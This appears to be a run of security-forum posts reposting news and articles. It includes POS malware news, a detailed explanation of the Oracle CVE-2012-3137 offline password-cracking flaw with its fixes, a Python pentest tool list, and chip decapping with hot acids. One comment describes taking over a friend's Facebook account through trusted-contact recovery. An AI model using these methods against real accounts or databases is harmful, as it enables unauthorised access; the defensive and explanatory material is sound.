Nytro

Facebook plateste bine, dar ganditi-va ce/cat ati putea face cu un SQL Injection sau Remote Code/Command Execution...

Asta e ca o vorba din popor: "Dupa ce te caci in mijlocul strazii, il mai iei si la palme".

Partea ciudata e urmatoarea: Adevarul spuneau in articolul lor ca in trecut acest tip a lucrat ca taximetrist.

"Cel mai cautat hacker din lume"

Cinci produse oferite gratuit de Ashampoo – Promotie limitata By Radu FaraVirusi(com) on January 20, 2014 Ashampoo ofera 5 produse de calitate cu licenta absolut gratuita. Este vorba despre Ashampoo WinOptimizer 2013, Ashampoo Burning Studio 2013 si Ashampoo Photo Commander 10, Ashampoo Snap 6, Ashampoo SlideshowStudio 2013. Bucurati-va de un sistem optimizat, crearea de discuri in orice tip de format si sistematizarea si aranjarea pozelor favorite folosind programele oferite mai sus. Folositi link-ul de mai jos pentru a beneficia de promotie: Your personal Ashampoo® gift Sursa: Cinci produse oferite gratuit de Ashampoo – Promotie limitata

Asa mai merge.

Stiu, nu e fun, dar e util.

30c3 - Mobile Network Attack Evolution Description: Mobile network attack evolution Mobile networks should protect users on several fronts: Calls need to be encrypted, customer data protected, and SIM cards shielded from malware. Many networks are still reluctant to implement appropriate protection measures in legacy systems. But even those who add mitigations often fail to fully capture attacks: They target symptoms instead of solving the core issue. This talks discusses mobile network and SIM card attacks that circumvent common protection techniques to illustrate the ongoing mobile attack evolution. The evolution is exemplified by new advanced attack vectors against mobile communication and SIM cards: Mobile calls and identities are known to be weakly protected, but network progressively rolled out patches to defeat hacking tools. We will discuss â and release â tools to measure whether these changes are effective. SIM cards were identified as a remote exploitation risk this year: Unnoticed by the victim, an attacker can take control over a card by sending a few binary SMS. Network operators started filtering binary SMS and patched some of their weak SIM card configurations in response to vulnerability research. The talk looks at filtering evasion techniques and discloses new configuration vulnerabilities present in many cards world-wide. For More Information please visit : - https://events.ccc.de/congress/2013/wiki/Main_Page Sursa: 30c3 - Mobile Network Attack Evolution

[h=1]Romanian Cybercriminals Launch “Decebal” POS Malware Written in VBScript[/h] January 18th, 2014, 09:53 GMT · By Eduard Kovacs esearchers from IT security firm IntelCrawler have identified a new malware, dubbed “Decebal,” that’s designed to steal information from point-of-sale (POS) systems. The threat has been written in VBScript and the functional code is less than 400 lines. Malware designed to target POS systems is becoming more and more popular, and the recent attacks aimed against Target, Neiman Marcus, and other US retailers demonstrate it. However, the Decebal malware – whose name stems from Decebalus, the king of Dacia, the historic region that today corresponds to Romania and Moldova – shows that such threats are constantly evolving. What’s interesting about Decebal is that it’s capable of checking to see if the computer on which it’s deployed is running any sandboxing or reverse engineering software. It’s also designed to validate payment card numbers. “There was also found Track 2 validation software, used by bad actors to check received compromised data by issuing bank by the first 6 digits (BIN), which has some phrases and text strings in Romanian, pointing on the original roots of possible authors,” IntelCrawler noted in its report. For instance, when an error occurs in the Track2 data validation process, the message “Esti beat?” is displayed in a pop-up. In Romanian, “Esti beat?” means “Are you drunk?” The strings “Select file” and “Validate” are also written in Romanian. The Decebal POS malware was first released on January 3, 2014. The threat has a very compact command and control server that acts as a gate for receiving data stolen from POS machines. “The code is pretty portable, scripting language is great advantage for easy infection to Point-of-Sale and is more flexible then binaries. This example shows that modern retailers environments can face with such threat and bad actors don't need to do lots of efforts for it,” explained Andrew Komarov, CEO of IntelCrawler. 14 hours ago, none of the antivirus engines from VirusTotal detected the threat. The sample was first checked on VirusTotal on January 12, but nothing has changed since then. Sursa: Romanian Cybercriminals Launch “Decebal” POS Malware Written in VBScript

De pe al cui cont Paypal oferi? Sugestie: nu faceti inca schimbul cu el, astept sa imi raspunda la intrebare.

Jailed terrorist gets extra time for refusing to divulge USB stick password by Lisa Vaas on January 17, 2014 A British man already in jail for terrorist activity was given another four months for refusing to give police the password to a memory stick that they couldn't crack. According to The Register, Judge Richard Marks QC sentenced Syed Hussain, 22, from Luton, for refusing to give up his password, contrary to section 53 of the Regulation of Investigatory Powers Act 2000 (RIPA), the UK's wiretapping law. The encrypted memory stick had been seized from Hussain's home during an April 2012 counter-terrorism operation. Hussain and three other men were jailed in 2012 after they admitted to discussing an attack on a local Territorial Army base headquarters. They had planned to send a homemade bomb to their targeted site via a remote controlled toy car, but the men were arrested before the attack could be carried out. Hussain's lawyers insisted that he couldn't remember the password to the memory stick, citing stress as the cause of his memory lapse. He kept up the "I forgot because I'm so stressed" argument for 11 months. During that time, police called in experts from GCHQ, the government's intelligence agency, but even they couldn't get at the stick's contents. So police and prosecutors set a deadline: they gave Hussain until last January to cough up the password. Then, 11 months after the deadline came and went, police told the convicted man's lawyers that they'd launched a fresh investigation: this one into alleged credit card fraud by Hussain. That seemed to jolt Hussain's memory. Within days, he handed over the password. It was "$ur4ht4ub4h8", which the Register reports is a play on words relating to a chapter of the Koran. When police used the password to unlock the contents of the memory stick, they found it held information relevant to the investigation into alleged fraud, but nothing relating to terrorism or national security. Sursa: Jailed terrorist gets extra time for refusing to divulge USB stick password | Naked Security

Recomandarea SIE c?tre demnitari: V? rug?m frumos nu vorbi?i pe mobil, mai ales în str?in?tate Recomandarea SIE c?tre demnitarii români este de a nu vorbi de pe telefoane mobile obi?nuite, mai ales atunci când se afl? în str?in?tate, ?i de a folosi liniile de comunica?ii de la misiunile diplomatice române?ti. Directorul Serviciului de Informa?ii Externe, Teodor Mele?canu, a declarat, la Digi 24, în contextul în care comenta scandalul iscat de dezv?luirile lui Eduard Snowden, c? 95% din totalul sateli?ilor declara?i ca fiind "de studiu" sunt sateli?i de spionaj. "Evident c? se ascult?. 95% din sateli?ii care se învârt în spa?iul extraatmosferic pentru «studierea pa?nic? a Cosmosului» sunt sateli?i de spionaj. Dac? lumea s-a sup?rat pentru asta, înseamn? c? e infantil?. Aaa, dac? sup?rarea a fost de cum a fost posibil s? se afle ?i a?a mai departe, asta e altceva", a spus Mele?canu. Directorul SIE a ad?ugat c? nu interceptarea mesajelor este problema, ci decriptarea lor. "Tot ce este semnal audio, video ?i a?a mai departe ?i iese în atmosfer? este interceptat. Majoritatea sunt îns? criptate ?i problema e dac? po?i s? le decriptezi. Dar de interceptat, se intercepteaz?. ?i noi facem asta, ?i toat? lumea (...) Sigur, dac? sunt criptate, ajungi mai greu la ele. Înseamn? c? au valoare mai mare", a punctat Teodor Mele?canu. Întrebat dac? ?i SIE ascult? deciden?i politici din alte ??ri, directorul institu?iei a r?spuns: "Nu, dar de multe ori ajung asemenea semnale ?i la noi". ?eful SIE a precizat c? România, odat? intrat? în NATO, s-a obligat prin tratat s? nu aib? opera?iuni pe teritoriul altor state "nici de interceptare, nici de alt tip". Pe de alt? parte, Mele?canu a dat de în?eles c? este posibil ca deciden?i români s? fi fost asculta?i de servicii str?ine, mai ales dac? au avut convorbiri din str?in?tate, de pe telefoane necodificate. "Eu, personal, nu exclud. Mai ales dac? au vorbit din str?in?tate pe telefoane mobile obi?nuite, e foarte posibil (...) Noi facem aceast? recomandare tuturor beneficiarilor: v? rug?m frumos nu vorbi?i pe telefonul mobil, mai ales dac? sunte?i în str?in?tate, într-o deplasare. Ave?i ceva de vorbit? E o ambasad?, sunt posibilit??i de a comunica. Dac? beneficiarul respect? sau nu, sigur c? e op?iunea lui", a declarat Teodor Mele?canu. Sursa: Recomandarea SIE c?tre demnitari: V? rug?m frumos nu vorbi?i pe mobil, mai ales în str?in?tate - Mediafax

Da. Daca vreti sa faceti teste pe alte conturi (decat al vostru), incercati dintr-un "Private window" sau dati "Clear cookies" inainte.

Nu e tocmai ceva nou, dar nu e de ajuns pentru a schimba parola. Am incercat si eu acum ceva timp pe contul unei prietene si am reusit sa obtin acces identificand 5 prieteni ai sai: am nimerit vreo 3 + vreo 2 pe care ii stiam. Altcineva ii schimbase parola prin aceeasi metoda si eu i-am recuperat contul. Incercai si azi si dadui peste 2 optiuni: 1. Sa trimita un cod catre 3 persoane si sa obtii acele coduri 2. Raspuns la intrebarea de securitate Poate merge in anumite conditii dar sansele sunt destul de mici.

Use this SSL Converter to convert SSL certificates to and from different formats such as pem, der, p7b, and pfx. Different platforms and devices require SSL certificates to be converted to different formats. For example, a Windows server exports and imports .pfx files while an Apache server uses individual PEM (.crt, .cer) files. To use the SSL Converter, just select your certificate file and its current type (it will try to detect the type from the file extension) and then select what type you want to convert the certificate to and click Convert Certificate. For more information about the different SSL certificate types and how you can convert certificates on your computer using OpenSSL, see below. https://www.sslshopper.com/ssl-converter.html

Antivirus Evasion: Lessons Learned – thelightcosine Derbycon 2013 Description: Over the past year, the speaker has spent alot of time talking with people in the infoSec Community and doing research on antivirus evasion techniques. Learning what works and what doesn't. There are a lot of good ideas floating around out there. In this talk we're going to pull those ideas all together. We'll discuss the basics of the AV evasion problem, what techniques work, which ones don't and why. The talk will have a particular focus on AV evasion as it relates to Metasploit payloads. Bio: David "thelightcosine" Maloney is a Senior Software Engineer on the Metasploit team at Rapid7. Before that he was a Penetration Tester for some large Corporations, specializing in Web Applications and was a longtime contrutor to the Metasploit Framework. He is a member of the Corelan Security Team, and sort of an auxiliary member of the FALE locksport group. He is one of the founders of Hackerspace Charlotte in NC. Sursa: Antivirus Evasion: Lessons Learned – thelightcosine Derbycon 2013 (Hacking Illustrated Series InfoSec Tutorial Videos)

[h=1]How to «open» microchip and what's inside?[/h]Microchips - are indeed can be considered a black box - as long as it's working you normally don't look inside. But what if you want to? Today we'll show how to "open" chips and what's inside. WARNING! All operations with concentrated (and especially hot) acids are extremely dangerous. Only trained persons should work with them using required protective equipment (acid-prof gloves, protection glasses, protective suit, fume hood and more). Remember that you only have 2 eyes! This article is for educational purposes only, do not try to repeat!. [h=1]Opening microchips[/h]Take some microchips of interest and add concentrated sulfuric acid. Container should be closed, but not airtight, so that fumes can escape (that is extremely important). Heat it to boiling temperature (300 °C). White substance at the bottom is baking soda - it's here to neutralize accidental spills and part of fumes. After 30-40 minutes, acid "burns" plastic to carbon: After it cools down, we can sort what is ready for next step and what needs another acid bath (thick, bulky packages usually need 2-3 rounds): If pieces of carbon stuck to the microchip itself and cannot be removed mechanically, one can remove them in hot concentrated nitric acid (temperature is much lower, ~110-120 °C): [h=1]Taking a look[/h]Images are clickable (beware of 5-25Mb JPEG's). Colors are enhanced, in reality they are much less saturated. PL2303HX — USB<>RS232 converter, chips like this are used in Arduino-like boards for example: LM1117 — low-dropout linear regulator: 74HC595 — 8-bit shift register: NXP 74AHC00 — quad 2-input NAND gate. This is a nice example that 'old' tech nodes (1µm and older) are still in use. Also, note how many spare via are there for improved yield.. Micron MT4C1024 — 1 mebibit (220 bit) dynamic ram. Widely used in 286 and 386-era computers, early 90's. Die size - 8662x3969µm. AMD Palce16V8h GAL is an 32x64 array of AND elements. GAL(Generic array logic) microchips are FPGA and CPLD grandfathers. Die size - 2434x2079µm, 1µm technology. ATtiny13A — one of the smallest Atmel's microcontrollers: only 1kb of flash and 32 bytes of SRAM. Die size though appeared to be unexpectedly big (1620x1640 µm). 500nm technology node. ATmega8 — one of the most popular 8-bit microcontrollers. Die size - 2855x2795µm, technology node 500nm. KR580IK80A (later renamed to KR580VM80A) - one of the most widespread soviet processors. Contrary to popular belief, it appeared to be not an Intel 8080A (or 8080) clone, but a code-compatible redesign (while several parts are quite similar, routing is different as well as pad placement). Thinnest lines are 6µm. STM32F100C4T6B — is the smallest microcontroller made by STMicroelectronics based on ARM Cortex-M3 core. Die size - 2854x3123µm. Altera EPM7032 — Altera EPM7032 - CPLD that have seen a lot... One of the last using 5V supply. Die size - 3446x2252µm, technology node 1µm. MIFARE chip, used in Moscow's subway RFID tickets. Die size - 640x620 µm. Now black box is open Follow us on Twitter @Zeptobars or subscribe to our RSS feed - we'll continue opening chips. Sursa: How to «open» microchip and what's inside? : ZeptoBars

[h=2]Oracle Database 11g stealth password cracking vulnerability in logon protocol (CVE-2012-3137)[/h]Posted February 20, 2013 by TeamSHATTER Admin The vulnerability I will describe in this blog post has some aspects that make it especially noteworthy, which are derived from the fact that the issue lies in a critical portion of the authentication protocol. The vulnerability can be exploited in a stealth way, going undetectable because all the attacker needs is information that the Server sends freely as part of a normal authentication process. In addition, the vulnerability is so intimately part of the authentication protocol that it couldn’t be fixed without requiring an update of the client software, consequently fixing the vulnerability required to deprecate the affected protocol version and use older or newer versions. There has been some back and forth with Oracle regarding the fix for this vulnerability from the moment I reported it on April 2010. In the second half of 2011, Oracle provided a fix in the latest patchset release 11.2.0.3 and closed the issue as the fix would be included in future releases. But there were some clear problems with this fix that concerned us. The fix was not enabled by default (it required configuration changes) and it was not going to be part of a Critical Patch Update, therefore there would be no fix for all existing supported affected releases. Fortunately, the story had a happy ending, when Oracle decided to include a proper fix in October 2012 CPU for all supported affected releases and with the fix being enforced without the need of a configuration change. I will describe later how to protect a system from this vulnerability, by applying the fixes provided by Oracle and also a few workarounds for those that are not able to apply the fixes at this time, but first let’s go over the details of the vulnerability to understand where the problem lies and how risky it is. Overview of the vulnerability The Oracle Logon protocol is the native authentication mechanism that Oracle Database provides to authenticate its database users. As part of the initial process during the authentication, the client sends the username to be authenticated to the Server, which then responds with a random Session Key and the password salt of the user. There is a flaw in the way in which this Session Key, a critical component of the protocol, is protected. This flaw allows an attacker to apply password cracking techniques to guess the correct password of the user. All the attacker needs is a Session Key and the Salt which are freely sent by the Database server to anyone requesting a connection, prior to the authentication taking place. It is important to note that the attacker only needs to start the normal authentication process to obtain this Session Key, therefore the server can’t differentiate an attacker from a genuine user connection. Who is vulnerable? Oracle Database servers using logon protocol version 11 (i.e. based on SHA-1 password hashes). This includes releases 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2 and 11.2.0.3 (unless protocol version 12 is required) on all platforms. Releases 10.2.0.X are vulnerable only if Enterprise User Security (EUS) is used and the directory has SHA-1 password verifiers generated. All database users that are authenticated by the Database (user identified by password) are susceptible to this attack. This excludes external users, such as OS users, which are not authenticated by the Database. Specifically this vulnerability affects database user accounts using SHA-1-based password hashes for authentication. Accounts with SHA-1-based password verifiers appear as “11G” in the PASSWORD_VERSIONS column of DBA_USERS view. Database user accounts using exclusively a DES-based password verifier (“10G”) for authentication are unaffected. Who can exploit the vulnerability? Anyone who has network access to the database server can exploit the vulnerability, no authentication is required. The attacker only needs to know the Service name or SID of the database and a username that is authenticated using a password. For example, the highly privileged SYS user is a good attack target. What can an attacker do? A remote attacker can perform a stealth offline password brute force attack for a given username. No audit is trail left on the server for an invalid login attempt. The time that it takes to crack the password depends on the strength of the password (length, complexity, character set used, etc.) and the processing power of the attacker. For example on current mainstream CPUs it is possible to crack an 8 character lower case alphabetic password in approximately 5 hours. For more complex passwords attackers can use dictionary or hybrid approaches with high end GPUs which have a lot more processing power to crack passwords than standard CPUs. The effort is equivalent to password brute forcing of a known password hash and salt. Vulnerability Details Now I would like to describe more in detail where the vulnerability resides. As I mentioned earlier, during the initial phase of the authentication sequence, the client sends the username of the authenticating user to the Server, which responds with a random Session Key and the password salt. This Session Key is a random value that will be used to protect the password that is sent by the Client. It is encrypted using an AES block cipher with the key being the password hash for the user (stored in the SYS.USER$ table or the password file) and using PKCS7 padding. The use of PKCS7 padding is the major design flaw in this implementation. The encrypted Session Key that is sent by the Server is 48-bytes long but when decrypted (with the padding removed) it is 40-bytes long. This padding is a fixed sequence of bytes that are automatically removed when decrypted using the padding algorithm, a technique often used in conjunction with block ciphers like AES when the sequence of bytes to be encrypted is not a multiple of the block size (16-bytes for AES). If the Session Key is decrypted without removing the padding we find that all Session Keys end with a sequence of eight bytes with a value of 0×08 when the correct password hash is used as the key. E_sk = AES_192_CBC (sk || {0x08}*8, key=Password Hash) Sk (40 bytes long) = Session Key generated by the server. E_sk (48 bytes long): The session key generated by the Server (sk) encrypted with AES cipher using the password hash as the key, adding PKCS7 padding. This is what the server sends to the client. Knowing this, it is possible to verify any password and determine if it is the correct password by calculating the hash and using it to decrypt the Session Key. If the result ends with the above 8-byte padding, then the password is correct. To be precise, the probability that it is the correct password is 1-1/2^64 which means there may be 1 false positive in every 10^19 tries. This is a very large number and if we want to be sure that this is not a false positive we can double check with another Session Key. This effort decreases the chance of false positives to 1 in 10^38 which is negligible. In short, the problem is the use of PKCS7 padding to protect the Session Key that is encrypted using the password hash. A proper implementation would have used random data for the remaining bytes of the block. This is the fix implemented in logon protocol version 12. This padding provides a way to link a Session Key with the password hash. The attack is stealth because the Oracle Database server can’t differentiate a genuine authentication attempt with that of an attacker trying to get a Session Key for brute forcing. Also, as the attacker can stop the authentication process before sending a password, the authentication is never completed, therefore the native database auditing won’t record any trace of the intrusion. How to protect Limiting the network accessibility of the Oracle Database server is a good starting point to reduce exposure to potential attackers. This can be done using a network firewall or by setting node checking in SQLNET.ORA file (the settings are TCP.VALIDNODE_CHECKING, TCP.EXCLUDED_NODES and TCP.INVITED_NODES). History of the fixes TeamSHATTER reported this vulnerability to Oracle on April 21, 2010. One year and a half later, the vulnerability was fixed by releasing a new logon protocol version 12 as part of patchset 11.2.0.3 (both at client and server level). Logon protocol version 12 is no longer susceptible to this vulnerability because the padding in the Session Key is filled with random data instead of a fixed value, thus making impossible to determine if the password hash is correct or not when decrypting it. The problem with this initial fix was that the server by default was still vulnerable because the older vulnerable version 11 of the logon protocol was still allowed, most probably for backward compatibility with clients older than 11.2.0.3. To stop being vulnerable it was required to set SQLNET.ALLOWED_LOGON_VERSION equal to 12. This way only logon protocol version 12 was allowed on the server. However, this configuration change required that all client software also be upgraded to 11.2.0.3, to support the new version of the protocol. This requirement to upgrade all client software was another problem with this fix that made it very difficult to implement. Oracle closed the issue after providing this fix and told TeamSHATTER that the fix would not be included in a future Critical Patch Update. In this way the vulnerability would continue to be exploitable for most of the affected databases. Fortunately Oracle changed their mind and decided to provide a proper fix in October 2012 Critical Patch Update for all supported affected releases (not only 11.2.0.3). This time the fix is enforced by default because logon protocol version 11 is no longer allowed on the server, without the need of a configuration change. Also the fix doesn’t require a client software upgrade (there are some exceptions noted in the following section) because protocol version 10 is also allowed and clients that don’t support version 12 are automatically downgraded to version 10. In the following sections I will describe how to protect from this vulnerability. First I will explain what fixes can be installed to address the vulnerability and then I will go over some workarounds that can be applied for those that can’t install the patches right now. IMPORTANT NOTE: Make sure to test any configuration change on a test environment before implementing it on production systems. Apply October 2012 Critical Patch Update The October 2012 CPU contains fixes for this vulnerability. Oracle fixed the vulnerability by forbidding the use of logon protocol version 11 in the Oracle Database server. After applying the CPU the server will exclusively use earlier versions of the protocol, like 10 or the new version 12. It is important to understand that ending the use of logon protocol version 11, enforced by applying the CPU, could impact the ability of some clients to connect to the database server. Thus it is important to spend some time before applying the CPU to analyze if your database users or applications will be impacted by this or not. First of all, if the CPU is going to be applied to all clients before applying the CPU to the server, or all clients are release 11.2.0.3, then there is nothing to worry about because those clients support protocol version 12. The compatibility issues arise when there is no way for a client to communicate using protocol versions other than 11, like 10 or 12. If the client does not support logon protocol version 12, then version 10 will be used. If the Server does not have 10g verifiers (hashes), maybe because it is configured to only allow protocol version 11 (and above), then there is no way for the client to authenticate. If your sqlnet.ora file (located by default at {ORACLE_HOME}/network/admin) contains the line SQLNET.ALLOWED_LOGON_VERSION=11 then there is significant chance that users will be affected by applying the CPU. Running the following query will determine the user accounts that do not have 10g version verifiers: SELECT username FROM dba_users WHERE nvl(PASSWORD,'X') <> 'EXTERNAL' AND nvl(PASSWORD,'X') <> 'GLOBAL' AND password_versions NOT LIKE '%10G%'; See the Patching for CVE-2012-3137 [iD 1493990.1] document available at Oracle Support for more information on how to determine if the clients will be affected by applying the CPU. The use of logon protocol version 10 and consequently the use of DES-based password verifiers may not be adequate for some customer’s security compliance requirements. These customers may be forced to work exclusively with protocol version 12 that uses the SHA-1 passwords verifiers and contains a fix to the vulnerability described in this blog post. The following section explains this solution. Exclusive use of the new logon protocol version 12 (only compatible with client software higher than 11.2.0.3 or that has October 2012 CPU applied) This is the best way to fix this vulnerability, but it comes with some requirements that may be difficult to fulfill. This is the ideal solution because there is no need to fall back to logon protocol version 10 and lose all the security improvements introduced in version 11, like case sensitive passwords and SHA-1 salted password hashes. Implementing this protection requires to have client software that supports logon protocol version 12. The clients that support this protocol version are release 11.2.0.3 (or higher) and also clients with October 2012 (or later) CPU applied. Once the server and all clients have been upgraded, apply October 2012 CPU to the Oracle Database Server (not needed if the server is release 11.2.0.3 or higher) and configure the server to allow only logon protocol version 12: Add (or edit) the following line in the sqlnet.ora file (located at ORACLE_HOME/network/admin): SQLNET.ALLOWED_LOGON_VERSION=12 Oracle Database Server release 11.2.0.3 already has support for logon protocol version 12, even if the October 2012 CPU is not applied, but to stop being vulnerable it is required to set SQLNET.ALLOWED_LOGON_VERSION=12. IMPORTANT NOTE: After this configuration change is implemented Oracle clients that don’t support logon protocol 12 (currently client version lower than 11.2.0.3 without the October 2012 CPU applied) will not be able to connect to the server. The following sections contain information on workarounds to protect from this vulnerability for those who are unable to apply patches at this moment. Workaround 1: Implement strong password policies This workaround poses some difficult questions. How long and complex should a password be in order to be certain that no attacker can crack it in reasonable time? How long should the lifetime of a password be so that the attacker can’t crack it during that period? These questions are difficult to answer because we don’t know the resources that the attacker possesses. Password cracking techniques are advancing quickly and what seems secure today can be insecure tomorrow. In general a password longer than 12 characters (using the full character set: numbers, lower and upper case and special characters) and not derived from a Dictionary word, is considered secure. In addition to password complexity, it is also important that the password expiration is set to 90 days or less. A strong password policy can be enforced by the use of Oracle Profiles. After the password policy is modified, organizations must require users to change passwords to conform to the new requirements. Keep in mind that this workaround does not eliminate the vulnerability; instead the idea is to make an attack impractical by having passwords so difficult to crack that can’t be compromised during its restricted lifetime. Workaround 2: Use external authentication Users authenticated by external means (not by the Database) do not have a password hash stored in the database and consequently are not affected by this vulnerability. This includes users authenticated by the Operating System and the Network (SSL or third-parties like Kerberos). See Configuring Authentication for more information on implementing these authentication methods. Workaround 3: Disable protocol version 11 and use version 10 or lower (SEC_CASE_SENSITIVE_LOGON = FALSE) Protocol version 10 or lower is not vulnerable to this attack. Oracle by default keeps two different hashes for each password, a DES based hash for version 10 and lower and the SHA-1 based hash for version 11. This workaround has been divided into separate steps for better understanding. All steps are required. Step 2a must be completed first. Steps 2b and 2c can be completed subsequently in any order. Step 2b protects regular users. Step 2c protects administrative users (users granted SYSDBA , SYSOPER or SYSASM). Step 2a) Before implementing this workaround we must ensure that all users authenticated by passwords will be able to connect using protocol version 10. To verify this we need to make sure that SQLNET.ALLOWED_LOGON_VERSION setting in sqlnet.ora file is not present, or if it is present it is set to 10 or lower. We also need to make sure that all users authenticated by passwords have a version 10 password hash. The following SQL query (when executed as SYS) lists all the users which are missing 10g hashes: SELECT username FROM dba_users WHERE nvl(PASSWORD,'X') <> 'EXTERNAL' AND nvl(PASSWORD,'X') <> 'GLOBAL' AND password_versions NOT LIKE '%10G%'; If this query returns any rows, the users listed must change passwords in order to generate proper version 10 DES based hashes. Step 2b) The next step is to change SEC_CASE_SENSITIVE_LOGON initialization parameter to FALSE, so that 11g authentication is not available and 10g or lower is used (which is not vulnerable to this attack). Execute the following SQL: ALTER SYSTEM SET SEC_CASE_SENSITIVE_LOGON = FALSE; Step 2c) SYSDBA, SYSOPER and SYSASM users are authenticated remotely using the password file instead of the hash in the SYS.USER$ table, thus, the password file needs to be recreated. After successfully recreating the password file, only the SYS user will be present, so for any other users with SYSDBA, SYSOPER or SYSASM privileges granted on the database, you must GRANT the SYSDBA/SYSOPER/ SYSASM privilege again to add them to the new password file. To get the list of SYSDBA/SYSOPER/SYSASM users currently present in the password file execute the following query: SELECT * FROM V$PWFILE_USERS; Rename the current password file or move it to another location. The location of the password file is: {ORACLE_HOME}/dbs/orapw{SID} for Unix/Linux , or {ORACLE_HOME}\database\PWD{SID}.ora for Windows. Next, use the orapwd utility to create a password file that uses 10g password hash. This can be done by specifying parameter ignorecase=y so that a version 10 case insensitive password is used. You will be asked for the SYS password. orapwd file={password_file_location} ignorecase=y After this only the SYS user will be present on the password file. If you want other users to have SYSDBA, SYSOPER or SYSASM privileges you need to grant them now by using GRANT SYSDBA/SYSOPER/SYSASM TO … statement. Conclusion After reading this blog post, I hope you will be convinced that this is a serious issue that requires immediate attention. If patching is not an option at this moment, one of the workarounds should be implemented to minimize the risk of exposure to this vulnerability. Sursa: Oracle Database 11g stealth password cracking vulnerability in logon protocol (CVE-2012-3137) | TeamSHATTER

Python tools for penetration testers If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them. Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs. Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side. Network Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection Dirtbags py-pcap: read pcap files without libpcap flowgrep: grep through packet payloads using regular expressions Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests) Debugging and reverse engineering Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH Immunity Debugger: scriptable GUI and command line debugger mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro PyEMU: fully scriptable IA-32 emulator, useful for malware analysis pefile: read and work with Portable Executable (aka PE) files pydasm: Python interface to the libdasm x86 disassembling library PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory diStorm: disassembler library for AMD64, licensed under the BSD license python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it Androguard: reverse engineering and analysis of Android applications Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library Fuzzing Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python) antiparser: fuzz testing and fault injection API TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer untidy: general purpose XML fuzzer Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer) SMUDGE Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns Fuzzbox: multi-codec media fuzzer Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms WSBang: perform automated security testing of SOAP based web services Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano Fusil: Python library used to write fuzzing programs Web Requests: elegant and simple HTTP library, built for human beings HTTPie: human-friendly cURL-like command line HTTP client ProxMon: processes proxy logs and reports discovered issues WSMap: find web service endpoints and discovery files Twill: browse the Web from a command-line interface. Supports automated Web testing Ghost.py: webkit web client written in Python Windmill: web testing tool designed to let you painlessly automate and debug your web application FunkLoad: functional and load web tester spynner: Programmatic web browsing module for Python with Javascript/AJAX support python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers Forensics Volatility: extract digital artifacts from volatile memory (RAM) samples LibForensics: library for developing digital forensics applications TrIDLib, identify file types from their binary signatures. Now includes Python binding aft: Android forensic toolkit Malware analysis pyew: command line hexadecimal editor and disassembler, mainly to analyze malware Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content pyClamAV: add virus detection capabilities to your Python software jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities yara-python: identify and classify malware samples phoneyc: pure Python honeyclient implementation PDF Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF) Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified. Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files pyPDF: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt... PDFMiner: extract text from PDF files python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support Misc InlineEgg: toolbox of classes for writing small assembly programs in Python Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging RevHosts: enumerate virtual hosts for a given IP address simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools Hachoir: view and edit a binary stream field by field py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools Other useful libraries and tools IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system Beautiful Soup: HTML parser optimized for screen-scraping matplotlib: make 2D plots of arrays Mayavi: 3D scientific data visualization and plotting RTGraph3D: create dynamic graphs in 3D Twisted: event-driven networking engine Suds: lightweight SOAP client for consuming Web Services M2Crypto: most complete OpenSSL wrapper NetworkX: graph library (edges, nodes) Pandas: library providing high-performance, easy-to-use data structures and data analysis tools pyparsing: 